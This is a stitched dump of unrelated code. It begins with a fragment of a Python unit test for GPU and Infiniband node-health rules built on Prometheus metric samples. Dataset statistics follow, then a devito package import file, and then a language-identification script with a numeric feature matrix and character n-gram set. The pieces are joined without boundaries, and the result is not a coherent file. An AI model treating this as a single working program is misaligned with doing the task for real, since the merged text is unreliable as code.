self.rule = DcgmEccDBERule()
def test_check_health(self):
# node has a ECC DBE on a GPU
dcgm_ecc_dbe_volatile_total = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'dcgm_ecc_dbe_volatile_total', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'minor_number': '0', 'scraped_from': 'job-exporter-zslkh', 'uuid': 'GPU-56d27439-dfc9-19d4-687b-ad6f2fdf0e9f'}, 'value': [1591920200.233, '0']}, {'metric': {'__name__': 'dcgm_ecc_dbe_volatile_total', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'minor_number': '1', 'scraped_from': 'job-exporter-zslkh', 'uuid': 'GPU-776cf9b1-fc9c-34c2-573b-33cac6cb496f'}, 'value': [1591920200.233, '2']}, {'metric': {'__name__': 'dcgm_ecc_dbe_volatile_total', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'minor_number': '2', 'scraped_from': 'job-exporter-zslkh', 'uuid': 'GPU-333595ba-3900-436e-9632-2e8d7b1577a3'}, 'value': [1591920200.233, '0']}, {'metric': {'__name__': 'dcgm_ecc_dbe_volatile_total', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'minor_number': '3', 'scraped_from': 'job-exporter-zslkh', 'uuid': 'GPU-cb1843c2-a39f-6b8a-a613-85fe145b405c'}, 'value': [1591920200.233, '0']}]}}
self.update_data_and_validate(
[dcgm_ecc_dbe_volatile_total, dcgm_ecc_dbe_volatile_total])
self.assertFalse(self.rule.check_health(self.node))
self.assertFalse(self.rule.check_health(self.node, stat="current"))
# node has no ECC DBE on any GPUs
dcgm_ecc_dbe_volatile_total = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'dcgm_ecc_dbe_volatile_total', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'minor_number': '0', 'scraped_from': 'job-exporter-zslkh', 'uuid': 'GPU-56d27439-dfc9-19d4-687b-ad6f2fdf0e9f'}, 'value': [1591920200.233, '0']}, {'metric': {'__name__': 'dcgm_ecc_dbe_volatile_total', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'minor_number': '1', 'scraped_from': 'job-exporter-zslkh', 'uuid': 'GPU-776cf9b1-fc9c-34c2-573b-33cac6cb496f'}, 'value': [1591920200.233, '0']}, {'metric': {'__name__': 'dcgm_ecc_dbe_volatile_total', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'minor_number': '2', 'scraped_from': 'job-exporter-zslkh', 'uuid': 'GPU-333595ba-3900-436e-9632-2e8d7b1577a3'}, 'value': [1591920200.233, '0']}, {'metric': {'__name__': 'dcgm_ecc_dbe_volatile_total', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'minor_number': '3', 'scraped_from': 'job-exporter-zslkh', 'uuid': 'GPU-cb1843c2-a39f-6b8a-a613-85fe145b405c'}, 'value': [1591920200.233, '0']}]}}
self.update_data_and_validate(
[dcgm_ecc_dbe_volatile_total, dcgm_ecc_dbe_volatile_total])
self.assertTrue(self.rule.check_health(self.node))
self.assertTrue(self.rule.check_health(self.node, stat="current"))
class TestInfinibandRule(TestRule):
def create_rule(self):
self.rule = InfinibandRule()
def test_check_health(self):
# An infiniband device is down
infiniband_up = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'infiniband_up', 'device': 'mlx4_0', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'link_layer': 'InfiniBand', 'phys_state': 'LinkUp', 'port': '1', 'rate': '40 Gb/sec (4X QDR)', 'scraped_from': 'job-exporter-zslkh', 'state': 'ACTIVE'}, 'value': [1592254588.528, '1']}, {'metric': {'__name__': 'infiniband_up', 'device': 'mlx4_1', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'link_layer': 'InfiniBand', 'phys_state': 'LinkUp', 'port': '1', 'rate': '40 Gb/sec (4X QDR)', 'scraped_from': 'job-exporter-zslkh', 'state': 'ACTIVE'}, 'value': [1592254588.528, '0']}]}}
self.update_data_and_validate([infiniband_up, infiniband_up])
self.assertFalse(self.rule.check_health(self.node))
self.assertFalse(self.rule.check_health(self.node, stat="current"))
# Infinibands devices are up
infiniband_up = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'infiniband_up', 'device': 'mlx4_0', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'link_layer': 'InfiniBand', 'phys_state': 'LinkUp', 'port': '1', 'rate': '40 Gb/sec (4X QDR)', 'scraped_from': 'job-exporter-zslkh', 'state': 'ACTIVE'}, 'value': [1592254588.528, '1']}, {'metric': {'__name__': 'infiniband_up', 'device': 'mlx4_1', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'link_layer': 'InfiniBand', 'phys_state': 'LinkUp', 'port': '1', 'rate': '40 Gb/sec (4X QDR)', 'scraped_from': 'job-exporter-zslkh', 'state': 'ACTIVE'}, 'value': [1592254588.528, '1']}]}}
self.update_data_and_validate([infiniband_up, infiniband_up])
self.assertTrue(self.rule.check_health(self.node))
self.assertTrue(self.rule.check_health(self.node, stat="current"))
class TestIPoIBRule(TestRule):
def create_rule(self):
self.rule = IPoIBRule()
def test_check_health(self):
# An IPoIB is down
ipoib_up = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'ipoib_up', 'device': 'ib0', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'scraped_from': 'job-exporter-zslkh', 'state': 'UP'}, 'value': [1592255865.342, '1']}, {'metric': {'__name__': 'ipoib_up', 'device': 'ib1', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'scraped_from': 'job-exporter-zslkh', 'state': 'DOWN'}, 'value': [1592255865.342, '0']}]}}
self.update_data_and_validate([ipoib_up, ipoib_up])
self.assertFalse(self.rule.check_health(self.node))
self.assertFalse(self.rule.check_health(self.node, stat="current"))
# All IPoIB interfaces are up
ipoib_up = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'ipoib_up', 'device': 'ib0', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'scraped_from': 'job-exporter-zslkh', 'state': 'UP'}, 'value': [1592255865.342, '1']}, {'metric': {'__name__': 'ipoib_up', 'device': 'ib1', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'scraped_from': 'job-exporter-zslkh', 'state': 'UP'}, 'value': [1592255865.342, '1']}]}}
self.update_data_and_validate([ipoib_up, ipoib_up])
self.assertTrue(self.rule.check_health(self.node))
self.assertTrue(self.rule.check_health(self.node, stat="current"))
class TestNvPeerMemRule(TestRule):
def create_rule(self):
self.rule = NvPeerMemRule()
def test_check_health(self):
# nv_peer_mem is down
nv_peer_mem_count = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'nv_peer_mem_count', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'scraped_from': 'job-exporter-zslkh'}, 'value': [1592256663.895, '0']}]}}
self.update_data_and_validate([nv_peer_mem_count, nv_peer_mem_count])
self.assertFalse(self.rule.check_health(self.node))
self.assertFalse(self.rule.check_health(self.node, stat="current"))
# nv_peer_mem is up
nv_peer_mem_count = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'nv_peer_mem_count', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'scraped_from': 'job-exporter-zslkh'}, 'value': [1592256663.895, '1']}]}}
self.update_data_and_validate([nv_peer_mem_count, nv_peer_mem_count])
self.assertTrue(self.rule.check_health(self.node))
self.assertTrue(self.rule.check_health(self.node, stat="current"))
class TestNVSMRule(TestRule):
def create_rule(self):
self.rule = NVSMRule()
def test_check_health(self):
# There is some failure in nvsm health check
nvsm_health_total_count = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'nvsm_health_total_count', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'scraped_from': 'job-exporter-zslkh'}, 'value': [1592257205.813, '169']}]}}
nvsm_health_good_count = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'nvsm_health_good_count', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'scraped_from': 'job-exporter-zslkh'}, 'value': [1592257205.813, '168']}]}}
self.update_data_and_validate([
nvsm_health_total_count, nvsm_health_total_count,
nvsm_health_good_count, nvsm_health_good_count
])
self.assertFalse(self.rule.check_health(self.node))
self.assertFalse(self.rule.check_health(self.node, stat="current"))
# All checks are good
nvsm_health_total_count = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'nvsm_health_total_count', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'scraped_from': 'job-exporter-zslkh'}, 'value': [1592257205.813, '169']}]}}
nvsm_health_good_count = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'nvsm_health_good_count', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'scraped_from': 'job-exporter-zslkh'}, 'value': [1592257205.813, '169']}]}}
self.update_data_and_validate([
nvsm_health_total_count, nvsm_health_total_count,
nvsm_health_good_count, nvsm_health_good_count
])
self.assertTrue(self.rule.check_health(self.node))
self.assertTrue(self.rule.check_health(self.node, stat="current"))
# Node is in exception list:
self.node.nvsm = None
self.assertTrue(self.rule.check_health(self.node))
self.assertTrue(self.rule.check_health(self.node, stat="current"))
if __name__ == '__main__':
unittest.main()
| 58 | 1,273 | 0.648027 | 1,909 | 15,254 | 4.932425 | 0.112101 | 0.048428 | 0.070093 | 0.076678 | 0.818288 | 0.799384 | 0.785684 | 0.761151 | 0.755204 | 0.755204 | 0 | 0.065309 | 0.175888 | 15,254 | 262 | 1,274 | 58.221374 | 0.683716 | 0.047266 | 0 | 0.491329 | 0 | 0 | 0.317781 | 0.043143 | 0 | 0 | 0 | 0 | 0.236994 | 1 | 0.127168 | false | 0.00578 | 0.034682 | 0 | 0.231214 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
75d6e13473b7847048fa01e7f51ddcdcc3e0e36b | 101 | py | Python | devito/ir/clusters/__init__.py | BrunoMot/devito | b6e077857765b7b5fad812ec5774635ca4c6fbb7 | [
"MIT"
] | 1 | 2020-01-30T17:49:12.000Z | 2020-01-30T17:49:12.000Z | devito/ir/clusters/__init__.py | BrunoMot/devito | b6e077857765b7b5fad812ec5774635ca4c6fbb7 | [
"MIT"
] | 1 | 2019-11-06T18:01:25.000Z | 2019-11-06T18:01:25.000Z | devito/ir/clusters/__init__.py | BrunoMot/devito | b6e077857765b7b5fad812ec5774635ca4c6fbb7 | [
"MIT"
] | 2 | 2018-11-15T12:03:48.000Z | 2018-11-15T13:16:19.000Z | from devito.ir.clusters.cluster import * # noqa
from devito.ir.clusters.algorithms import * # noqa
| 33.666667 | 51 | 0.762376 | 14 | 101 | 5.5 | 0.571429 | 0.25974 | 0.311688 | 0.519481 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.138614 | 101 | 2 | 52 | 50.5 | 0.885057 | 0.089109 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
75e0340b52036e9dbd2bfd415779234db463fed2 | 14,345 | py | Python | Ngrams.py | abigailyuan/LIDproj | 3e34c4d78b89c9513182ab064dc4b3858f59a1d2 | [
"MIT"
] | null | null | null | Ngrams.py | abigailyuan/LIDproj | 3e34c4d78b89c9513182ab064dc4b3858f59a1d2 | [
"MIT"
] | null | null | null | Ngrams.py | abigailyuan/LIDproj | 3e34c4d78b89c9513182ab064dc4b3858f59a1d2 | [
"MIT"
] | null | null | null | import math
import re
import string
from collections import defaultdict as dd
train_data = [[0.0, 0.48460213156441156, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.44129227922652936, 0.0, 0.0, 0.3242386242592802, 0.0, 0.0, 0.0, 0.4483154985245643, 0.08779024122543687, 0.0, 0.0, 0.0, 0.0, 0.0, 0.071402729530022, 0.05033307163591714, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.13344116666266403, 0.0, 0.002341073099344983, 0.2235724809874459, 0.0, 0.0, 0.0842786315764194, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.019899121344432356, 0.0, 0.0, 0.0, 0.004682146198689966, 0.0, 0.0, 0.416711011683407, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 'de'], [0.0, 0.011517021809825537, 0.0, 0.006581155319900307, 0.0, 0.0, 0.0, 0.0, 0.008226444149875382, 0.0, 0.0, 0.013162310639800614, 0.5396547362318251, 0.0, 0.0, 0.011517021809825537, 0.0, 0.0, 0.3027331447154141, 0.0, 0.0, 0.0, 0.006581155319900307, 0.0032905776599501534, 0.0, 0.0, 0.20895168140683473, 0.0, 0.0, 0.0, 0.0, 0.018098177129725845, 0.0, 0.0, 0.00493586648992523, 0.0, 0.0, 0.0032905776599501534, 0.45903558356304636, 0.3981598968539685, 0.0, 0.0, 0.0, 0.07568328617885353, 0.013162310639800614, 0.0, 0.0, 0.0, 0.0016452888299750767, 0.0, 0.0, 0.0032905776599501534, 0.0, 0.0, 0.0, 0.0, 0.0, 0.4442279840932707, 'fa'], [0.0, 0.29991858801208704, 0.0, 0.003107964642612301, 0.0, 0.0, 0.0, 0.0, 0.4187982355920076, 0.0, 0.0, 0.28049380899576015, 0.0, 0.0, 0.0, 0.4871734577294782, 0.027194690622857634, 0.0, 0.0, 0.0, 0.0, 0.0, 0.26573097694335174, 0.06060531053093987, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.32711327863494466, 0.0, 0.011654867409796129, 0.464640714070539, 0.0, 0.0, 0.07459115142269522, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.09323893927836903, 0.0, 0.0, 0.0, 0.006215929285224602, 0.0, 0.0, 0.07925309838661368, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 'en'], [0.0, 0.012838462075170039, 0.0, 0.15406154490204046, 0.15406154490204046, 0.0, 0.0, 0.0, 0.012838462075170039, 0.0, 0.0, 0.012838462075170039, 0.0, 0.0, 0.0, 0.025676924150340077, 0.0, 0.0, 0.0, 0.0, 0.0, 0.10270769660136031, 0.0, 0.0, 0.0, 0.0, 0.0, 0.680438489984012, 0.0, 0.42366924848061127, 0.0, 0.0, 0.0, 0.07703077245102023, 0.012838462075170039, 0.0, 0.25676924150340075, 0.025676924150340077, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.4750230967812914, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 'ja'], [0.0, 0.009648771597265387, 0.0, 0.009648771597265387, 0.0, 0.0, 0.0, 0.0, 0.01447315739589808, 0.0, 0.0, 0.01447315739589808, 0.0, 0.0, 0.0, 0.036986957789517313, 0.0, 0.4374109790760309, 0.0, 0.0, 0.0, 0.0, 0.022513800393619235, 0.0016081285995442312, 0.3988158926869693, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.019297543194530774, 0.4953036086596232, 0.0016081285995442312, 0.02733818619225193, 0.0, 0.0, 0.011256900196809617, 0.0, 0.0, 0.0, 0.4920873514605347, 0.0, 0.0, 0.0016081285995442312, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0032162571990884624, 0.19136730334576352, 0.0, 0.3489639061010982, 0.0, 0.0, 0.0, 'bg'], [0.0, 0.0038862654955984, 0.0, 0.005829398243397599, 0.0, 0.0, 0.0, 0.0, 0.013601929234594398, 0.0, 0.0, 0.005829398243397599, 0.0, 0.0, 0.0, 0.027203858469188796, 0.0, 0.39445594780323756, 0.0, 0.0, 0.0, 0.0, 0.013601929234594398, 0.0019431327477992, 0.2254033987447072, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0077725309911968, 0.47023812496740636, 0.0019431327477992, 0.009715663738996, 0.0, 0.0, 0.0019431327477992, 0.0, 0.0, 0.0, 0.5110439126711895, 0.0, 0.0, 0.0155450619823936, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.39834221329883596, 0.0, 0.38862654955984, 0.0, 0.0, 0.0, 'ru'], [0.0, 0.00571968110120663, 0.0, 0.002859840550603315, 0.0, 0.0, 0.0, 0.0, 0.01715904330361989, 0.0, 0.0, 0.0, 0.49475241525437347, 0.0, 0.0, 0.008579521651809944, 0.0, 0.0, 0.19446915744102541, 0.0, 0.0, 0.0, 0.008579521651809944, 0.002859840550603315, 0.0, 0.0, 0.4032375176350674, 0.0, 0.0, 0.0, 0.0, 0.008579521651809944, 0.0, 0.0, 0.002859840550603315, 0.0, 0.0, 0.00571968110120663, 0.0, 0.3746391121290342, 0.0, 0.0, 0.0, 0.44613512589411713, 0.10295425982171934, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00571968110120663, 0.0, 0.0, 0.0, 0.0, 0.0, 0.45185480699532377, 'ar'], [0.0, 0.29491658568464524, 0.0, 0.006325288701011157, 0.0, 0.0, 0.0, 0.0, 0.30519517982378835, 0.0, 0.0, 0.23166369867453365, 0.0, 0.0, 0.0, 0.4158877320914836, 0.1193898242315856, 0.007906610876263946, 0.0, 0.0, 0.0, 0.0, 0.5265802843591789, 0.3763546777101639, 0.004743966525758368, 0.0, 0.0, 0.0, 0.0015813221752527893, 0.0, 0.0, 0.07195015897400192, 0.008697271963890342, 0.018185205015407078, 0.23403568193741284, 0.0, 0.0, 0.23640766520029202, 0.0, 0.0, 0.0, 0.011069255226769525, 0.0, 0.0, 0.16762015057679566, 0.0, 0.0, 0.0, 0.031626443505055786, 0.0, 0.0, 0.120180485319212, 0.0007906610876263946, 0.0, 0.0055346276133847625, 0.0, 0.0, 0.0, 'unk'], [0.5894794740481756, 0.019390772172637353, 0.003878154434527471, 0.06205047095243953, 0.0, 0.0, 0.0, 0.2559581926788131, 0.027147081041692295, 0.027147081041692295, 0.0, 0.011634463303582412, 0.0, 0.0, 0.0, 0.05429416208338459, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.06980677982149447, 0.019390772172637353, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.023268926607164824, 0.0, 0.0, 0.06980677982149447, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5545760841374283, 0.0, 0.0, 0.0, 0.0, 0.0, 0.003878154434527471, 0.08531939755960435, 0.2947397370240878, 0.0, 0.0, 0.40720621562538445, 0.0, 0.0, 0.0, 0.0, 'mr'], [0.0, 0.26685250860506066, 0.0, 0.004252629619204154, 0.0, 0.0, 0.0, 0.0, 0.37529456389476656, 0.0, 0.0, 0.2944946011298877, 0.0, 0.0, 0.0, 0.5156313413285036, 0.4018734990147925, 0.0, 0.0, 0.0, 0.0, 0.0, 0.11801047193291526, 0.13183151819532876, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.07867364795527684, 0.0, 0.006378944428806231, 0.45290505444524237, 0.0, 0.0, 0.043589453596842576, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.038273666572837386, 0.0, 0.0, 0.0, 0.017010518476816616, 0.0, 0.0, 0.165852555148962, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 'fr'], [0.0, 0.4177737641253415, 0.0, 0.0010879525107430768, 0.0, 0.0, 0.0, 0.0, 0.38187133127082, 0.0, 0.0, 0.39275085637825075, 0.0, 0.0, 0.0, 0.36555204360967386, 0.26981222266428306, 0.0, 0.0, 0.0, 0.0, 0.0, 0.09030005839167538, 0.038078337876007694, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.21432664461638615, 0.0, 0.0021759050214861537, 0.2219423121915877, 0.0, 0.0, 0.05222172051566769, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.05113376800492461, 0.0, 0.0, 0.0, 0.004351810042972307, 0.0, 0.0, 0.4569400545120923, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 'nl'], [0.0, 0.06766917293233082, 0.0, 0.007518796992481203, 0.0, 0.37969924812030076, 0.0, 0.0, 0.041353383458646614, 0.0, 0.0, 0.03383458646616541, 0.007518796992481203, 0.0, 0.0, 0.08270676691729323, 0.0, 0.0, 0.11654135338345864, 0.40601503759398494, 0.0, 0.0, 0.022556390977443608, 0.015037593984962405, 0.0, 0.0, 0.3082706766917293, 0.0, 0.0, 0.0, 0.40977443609022557, 0.018796992481203006, 0.0, 0.0, 0.06766917293233082, 0.0, 0.0, 0.0037593984962406013, 0.5075187969924813, 0.16541353383458646, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3308270676691729, 'ur'], [0.0, 0.03681913914463891, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.06883578187910754, 0.0, 0.0, 0.09604992820340585, 0.0, 0.0, 0.0, 0.5250729408452853, 0.03201664273446862, 0.0, 0.0, 0.0, 0.0, 0.0, 0.4994596266577105, 0.360187230762772, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0208108177774046, 0.0, 0.0, 0.056029124785320086, 0.0, 0.0, 0.5218712765718385, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0208108177774046, 0.0, 0.0, 0.0, 0.22891899555145062, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 'it'], [0.0, 0.2188964504201349, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.023416829579828383, 0.0, 0.0, 0.22805955764702426, 0.0, 0.0, 0.0, 0.2555488793276924, 0.36754241210078464, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5324783421847933, 0.03868867495797733, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.060069258487385854, 0.0, 0.0020362460504198595, 0.40928545613439177, 0.0, 0.0, 0.42659354756296053, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.057014889411756066, 0.0, 0.0, 0.0, 0.0030543690756297892, 0.0, 0.0, 0.24027703394954342, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 'es'], [0.0, 0.0, 0.0, 0.02676438637860946, 0.0, 0.0, 0.0, 0.0, 0.02676438637860946, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.02676438637860946, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.02676438637860946, 0.0, 0.0, 0.3747014093005324, 0.0, 0.0, 0.0, 0.0, 0.0, 0.02676438637860946, 0.0, 0.02676438637860946, 0.02676438637860946, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.642345273086627, 0.0, 0.3747014093005324, 0.3747014093005324, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.4014657956791419, 0.0, 'ko'], [0.4940079820559727, 0.009106137918082445, 0.3961169994365864, 0.0, 0.0, 0.0, 0.0, 0.18667582732069013, 0.013659206877123669, 0.004553068959041223, 0.0, 0.011382672397603058, 0.0, 0.0, 0.0, 0.01593574135664428, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.01593574135664428, 0.011382672397603058, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.009106137918082445, 0.0, 0.0022765344795206113, 0.013659206877123669, 0.0, 0.0, 0.01593574135664428, 0.0, 0.0, 0.0, 0.0, 0.327820965050968, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5031141199740551, 0.30505562025576194, 0.0, 0.0, 0.33009749953048867, 0.0, 0.0, 0.0, 0.0, 'ne'], [0.5406059970783489, 0.02621119985834419, 0.24245359868968375, 0.019658399893758144, 0.0, 0.0, 0.0, 0.2227951987959256, 0.07863359957503258, 0.3341927981938884, 0.0, 0.02621119985834419, 0.0, 0.0, 0.0, 0.022934799876051164, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.019658399893758144, 0.029487599840637212, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.029487599840637212, 0.0, 0.0, 0.09173919950420466, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.4292083976803861, 0.0, 0.0, 0.0, 0.0, 0.0, 0.013105599929172094, 0.07208079961044653, 0.33746919817618143, 0.009829199946879072, 0.0, 0.4062735978043349, 0.0, 0.0, 0.0, 0.0, 'hi'], [0.0, 0.058722021951470346, 0.0, 0.0, 0.0, 0.0, 0.4404151646360276, 0.0, 0.08808303292720551, 0.0, 0.5284981975632331, 0.029361010975735173, 0.0, 0.0, 0.0, 0.029361010975735173, 0.0, 0.0, 0.0, 0.0, 0.38169314268455723, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.029361010975735173, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.46977617561176277, 0.38169314268455723, 0.0, 0.0, 0.0, 0.0, 0.0, 0.029361010975735173, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 'th'], [0.0, 0.009787589618983562, 0.0, 0.014681384428475342, 0.0, 0.0, 0.0, 0.0, 0.014681384428475342, 0.0, 0.0, 0.014681384428475342, 0.0, 0.0, 0.0, 0.019575179237967123, 0.0, 0.2789463041410315, 0.0, 0.0, 0.0, 0.0, 0.014681384428475342, 0.004893794809491781, 0.2300083560461137, 0.0, 0.0, 0.0, 0.5040608653776534, 0.0, 0.0, 0.004893794809491781, 0.3768222003308671, 0.0, 0.009787589618983562, 0.0, 0.0, 0.009787589618983562, 0.0, 0.0, 0.0, 0.401291174378326, 0.0, 0.0, 0.009787589618983562, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3866097899498507, 0.0, 0.401291174378326, 0.0, 0.0, 0.0, 'uk'], [0.0, 0.0, 0.0, 0.1102434659256059, 0.0, 0.0, 0.0, 0.0, 0.0881947727404847, 0.0, 0.0, 0.06614607955536353, 0.0, 0.0, 0.0, 0.04409738637024235, 0.0, 0.0, 0.0, 0.0, 0.0, 0.13229215911072706, 0.0, 0.022048693185121176, 0.0, 0.0, 0.0, 0.6394121023685142, 0.0, 0.0881947727404847, 0.0, 0.04409738637024235, 0.0, 0.1984382386660906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.7055581819238776, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 'zh'], [0.0, 0.009472398570543173, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.4641475299566155, 0.45467513138607235, 0.009472398570543173, 0.009472398570543173, 0.0, 0.0, 0.0, 0.0, 0.0, 0.009472398570543173, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3504787471100974, 0.0, 0.0, 0.0, 0.0, 0.5778163128031336, 0.0, 0.0, 0.0, 0.10419638427597491, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3315339499690111, 0.0, 0.0, 'he']]
Ngram_set = {'ว', 'и', 'ा', '?', '다', 'а', 'a', 'ה', 'de', '!', 'ي', 'י', 'र', '는', 'я', 'е', 'ه', 'ی', 'en', 'ת', 'e', 'ㅋㅋ', 'ी', '…', 'แล้ว', 'ר', 'о', 'ם', 'n', 'на', 'की', 'і', 'o', 'RT', '。', 'میں', 'े', 'ن', 'i', 'w', 'ے', 's', 'ๆ', 'di', 'ا', 'T', 'd', 'को', 't', 'م', 'た', 'त', 'ो', 'ㅋ', 'ะ', 'کے', 'و', 'r'}
test = '你好'
N = 4
K = 5
